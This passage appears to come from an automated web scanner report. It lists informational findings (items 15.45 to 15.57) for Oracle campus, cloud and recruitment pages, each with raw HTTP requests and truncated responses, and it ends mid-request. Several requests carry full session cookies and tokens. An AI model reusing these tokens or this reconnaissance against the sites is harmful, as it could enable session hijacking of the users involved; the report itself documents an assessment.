Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2768
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

15.45. https://campus.oracle.com/campus/HR/us_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us_main.html

Request

GET /campus/HR/us_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:21 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 33439
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.46. https://campus.oracle.com/campus/HR/viet_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/viet_main.html

Request

GET /campus/HR/viet_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:01 GMT
Accept-Ranges: bytes
Content-Length: 27199
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.47. https://campus.oracle.com/campus/HR/zealand-apply.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/zealand-apply.html

Request

GET /campus/HR/zealand-apply.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:30:06 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:01 GMT
Accept-Ranges: bytes
Content-Length: 3427
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.48. https://campus.oracle.com/campus/HR/zealand-home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/zealand-home.html

Request

GET /campus/HR/zealand-home.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854354624; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:30:03 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:01 GMT
Accept-Ranges: bytes
Content-Length: 9259
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.49. https://campus.oracle.com/campus/HR/zealand_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/zealand_main.html

Request

GET /campus/HR/zealand_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:47 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:01 GMT
Accept-Ranges: bytes
Content-Length: 27351
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.50. https://campus.oracle.com/campus/campus_feed.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/campus_feed.xml

Request

GET /campus/campus_feed.xml HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:03 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:05 GMT
Accept-Ranges: bytes
Content-Length: 11087
Connection: close
Content-Type: text/xml
X-Pad: avoid browser bug

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
   <channel>
   <title>Campus.oracle.com NEWS</title>
   <link>http://campus.oracle.com</link>
   <description>News about Oracle Campus</description>
...[SNIP]...

15.51. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

Request

GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:28 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 456625
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html><head><script>var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;</script></head><body><script><!--
var _,pbc='com.google.gwt.core.client.',qbc='com.google.gwt.http.client.'
...[SNIP]...

15.52. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/TodoApp.html

Request

GET /campus/gwt/otn.todo.TodoApp/TodoApp.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand-apply.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:25 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 1919
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <!-- -->
       <!-- Any title is fine -->
       <!--
...[SNIP]...

15.53. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

15.54. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

15.55. https://irecruitment.oracle.com/OA_HTML/OA.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/OA.jsp

Request

GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 23021
Date: Mon, 17 Oct 2011 12:23:23 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OA.jsp


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>Available Jobs</title><meta name="generator" content="Oracl
...[SNIP]...

15.56. https://irecruitment.oracle.com/OA_HTML/RF.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/RF.jsp

Request

GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 46433
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Date: Mon, 17 Oct 2011 12:22:56 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OA.jsp


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>iRecruitment Visitor Home Page</title><meta name="generator
...[SNIP]...

15.57. https://irecruitment.oracle.com/OA_HTML/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/blank.html

Request

GET /OA_HTML/blank.html HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://irecruitment.oracle.com/OA_HTML/blank.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
